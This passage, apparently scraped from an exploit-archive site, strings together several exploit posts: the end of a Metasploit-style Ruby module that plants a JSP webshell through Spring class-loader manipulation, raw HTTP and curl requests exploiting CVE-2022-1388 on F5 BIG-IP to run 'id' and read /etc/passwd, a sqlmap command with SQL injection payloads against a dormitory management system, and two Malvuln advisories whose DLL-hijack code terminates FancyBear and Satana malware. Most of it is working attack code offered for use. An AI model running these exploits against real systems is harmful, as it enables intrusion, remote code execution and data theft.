Rex::Text.rand_text_alpha_lower(4..6) }<br /> )<br /><br /> # setting the default assertion status to a valid status<br /> send_request_cgi(<br /> 'method' => method,<br /> 'uri' => normalize_uri(datastore['TARGETURI']),<br /> vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' }<br /> )<br /> return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400<br /> end<br /><br /> Exploit::CheckCode::Safe<br /> end<br /><br /> def exploit<br /> prefix_jsp = rand_text_alphanumeric(rand(3..5))<br /> date_format = rand_text_numeric(rand(1..4))<br /> @jsp_file = prefix_jsp + date_format + '.jsp'<br /> http_method = datastore['HTTP_METHOD']<br /> if http_method == 'Automatic'<br /> # if the check was skipped but we need to automatically identify the method, we have to run it here<br /> @checkcode = check if @checkcode.nil?<br /> http_method = @checkcode.details[:method]<br /> fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank?<br /><br /> print_good("Automatically identified HTTP method: #{http_method}")<br /> end<br /><br /> # if the check method ran automatically, add a short delay before continuing with exploitation<br /> sleep(5) if @checkcode<br /><br /> # Prepare the JSP<br /> print_status("#{peer} - Generating JSP...")<br /><br /> # rubocop:disable Style/FormatStringToken<br /> jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i')<br /> # rubocop:enable Style/FormatStringToken<br /><br /> # Modify the Class Loader<br /> print_status("#{peer} - Modifying Class Loader...")<br /> properties = {<br /> payload: jsp,<br /> directory: datastore['PAYLOAD_PATH'],<br /> prefix: prefix_jsp,<br /> suffix: '.jsp',<br /> file_date_format: date_format<br /> }<br /> res = modify_class_loader(http_method, properties)<br /> unless res<br /> fail_with(Failure::TimeoutExpired, "#{peer} - No answer")<br /> end<br /><br /> # No matter what happened, try to 'restore' the Class Loader<br /> properties = {<br /> payload: '',<br /> directory: '',<br /> prefix: '',<br /> suffix: '',<br /> file_date_format: ''<br /> }<br /><br /> modify_class_loader(http_method, properties)<br /><br /> check_log_file<br /><br /> handler<br /> end<br /><br /> # Retry the block until it returns a truthy value. Each iteration attempt will<br /> # be performed with expoential backoff. If the timeout period surpasses, false is returned.<br /> def retry_until_true(timeout:)<br /> start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)<br /> ending_time = start_time + timeout<br /> retry_count = 0<br /> while Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time<br /> result = yield<br /> return result if result<br /><br /> retry_count += 1<br /> remaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)<br /> break if remaining_time_budget <= 0<br /><br /> delay = 2**retry_count<br /> if delay >= remaining_time_budget<br /> delay = remaining_time_budget<br /> vprint_status("Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}")<br /> else<br /> vprint_status("Sleeping for #{delay} seconds before attempting again")<br /> end<br /><br /> sleep delay<br /> end<br /><br /> false<br /> end<br />end<br /></code></pre>
<pre><code># F5 BIG-IP RCE exploitation (CVE-2022-1388)<br /><br />POST (1): <br /><br />POST /mgmt/tm/util/bash HTTP/1.1<br />Host: <redacted>:8443<br />Authorization: Basic YWRtaW46<br />Connection: keep-alive, X-F5-Auth-Token<br />X-F5-Auth-Token: 0<br /><br />{"command": "run" , "utilCmdArgs": " -c 'id' " }<br /><br />curl commandliner: <br /><br />$ curl -i -s -k -X $'POST'<br />-H $'Host: <redacted>:8443' <br />-H $'Authorization: Basic YWRtaW46' <br />-H $'Connection: keep-alive, X-F5-Auth-Token' <br />-H $'X-F5-Auth-Token: 0' <br />-H $'Content-Length: 52' <br />--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \'id\' \" }\x0d\x0a'<br />$'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080<br /><br /><br />POST (2):<br /><br />POST /mgmt/tm/util/bash HTTP/1.1<br />Host: <redateced>:8443<br />Authorization: Basic YWRtaW46<br />Connection: keep-alive, X-F5-Auth-Token<br />X-F5-Auth-Token: 0<br /><br />{"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " }<br /><br />curl commandliner:<br /><br />$ curl -i -s -k -X $'POST'<br />-H $'Host: <redacted>:8443' <br />-H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token' <br />-H $'X-F5-Auth-Token: 0'<br />--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \' cat /etc/passwd\' \" }\x0d\x0a\x0d\x0a'<br />$'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080<br /><br />Note: <br /><br />Issue could be related between frontend and backend authentication "Jetty" with empty credentials "admin: <empty>" <br />+ value of headers ,see "HTTP hop_by_hop request headers"...<br /><br />References and Fixes :<br />* https://support.f5.com/csp/article/K23605346<br />* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388<br /><br />Here the documentation used latest nites:<br />* https://clouddocs.f5.com/api/icontrol-rest/ <br /><br />HTTP hop_by_hop request headers: <br />* https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open<br /><br /># Author<br />Alex Hernandez aka @_alt3kx_<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/d6751b148461e0f863548be84020b879.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: APT28 FancyBear<br />Vulnerability: Code Execution<br />Description: FancyBear looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware. The exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signature or third-party product, the malwares own flaw will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: FancyBear<br />Type: PE32<br />MD5: d6751b148461e0f863548be84020b879<br />Vuln ID: MVID-2022-0594<br />Disclosure: 05/09/2022<br /><br />Exploit/PoC:<br />Video Poc URL: https://www.youtube.com/watch?v=8v2bqRX2AEU<br /><br />Exploit/PoC:<br />1) Compile the following C code as "winhttp.dll"<br />2) Place the DLL in same directory as the malware<br />3) Optional - Hide it: attrib +s +h "winhttp.dll"<br />4) Run FancyBear<br /><br />#include "windows.h"<br /><br />//By malvuln<br />//Purpose: Exploit FancyBear<br />//MD5: d6751b148461e0f863548be84020b879<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//gcc -c winhttp.c -m32<br />//gcc -shared -o winhttp.dll winhttp.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> GetCurrentDirectory(MAX_PATH, TEXT(buf));<br /> int rc = strcmp("C:\\Windows\\System32", TEXT(buf));<br /> if(rc != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: School Dormitory Management System - 'month' SQL Injection<br /># Date: 08/05/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /><br /><br /><br /># Vulnerable Code<br /><br />line 59 in file "/dms/admin/reports/daily_collection_report.php"<br /><br />$qry = $conn->query("SELECT p.*, a.code, s.code as student_code, concat(s.firstname, ' ', coalesce(concat(s.middlename,' '), ''), s.lastname) as `student`, d.name as dorm, r.name as `room` from payment_list p inner join account_list a on p.account_id = a.id inner join student_list s on a.student_id = s.id inner join room_list r on a.room_id = r.id inner join dorm_list d on r.dorm_id = d.id where (p.month_of) = '{$month}' order by student asc ");<br /><br /># Sqlmap command:<br /><br />sqlmap -u "http://localhost/dms/admin/?month=1&page=reports/daily_collection_report" -p month --level=5 --risk=3 --dbs --random-agent --eta<br /><br /># Output:<br /><br />Parameter: month (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: month=1' AND (SELECT 3271 FROM (SELECT(SLEEP(5)))duQT) AND 'NgBP'='NgBP&page=reports/daily_collection_report<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 11 columns<br /> Payload: month=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626b6a71,0x485362486f7266597a444d417754744873427366706c4a4f706b7949467a6a61505468424c476753,0x716b6a7171),NULL,NULL,NULL,NULL-- -&page=reports/daily_collection_report<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/46bfd4f1d581d7c0121d2b19a005d3df.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransom.Satana<br />Vulnerability: Code Execution<br />Description: Satana searches for and loads a DLL named "wow64log.dll" in Windows\System32. Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit dll will simply display a Win32API message box and call exit(). The exploit DLL must export "InterlockedExchange" function or it fails with error. We do not need to rely on hash signature or third-party product, the malwares own flaw will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Satana<br />Type: PE32<br />MD5: 46bfd4f1d581d7c0121d2b19a005d3df<br />Vuln ID: MVID-2022-0593<br />Disclosure: 05/07/2022<br />Video PoC URL: https://www.youtube.com/watch?v=AkuqcPZbah8<br /><br />Exploit/PoC:<br />1) Compile the following C code as "wow64log.dll" as x64<br />2) Place the DLL in Windows\System32<br />3) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln <br />//Purpose: Exploit Satana<br />//MD5: 46bfd4f1d581d7c0121d2b19a005d3df<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//compile as x64<br />//gcc -c wow64log.c <br />//gcc -shared -o wow64log.dll wow64log.o <br />//DLL must live under Windows\System32 dir<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> exit(0);<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br />extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange (LONG volatile *Target, LONG Value){<br /> exit(1);<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>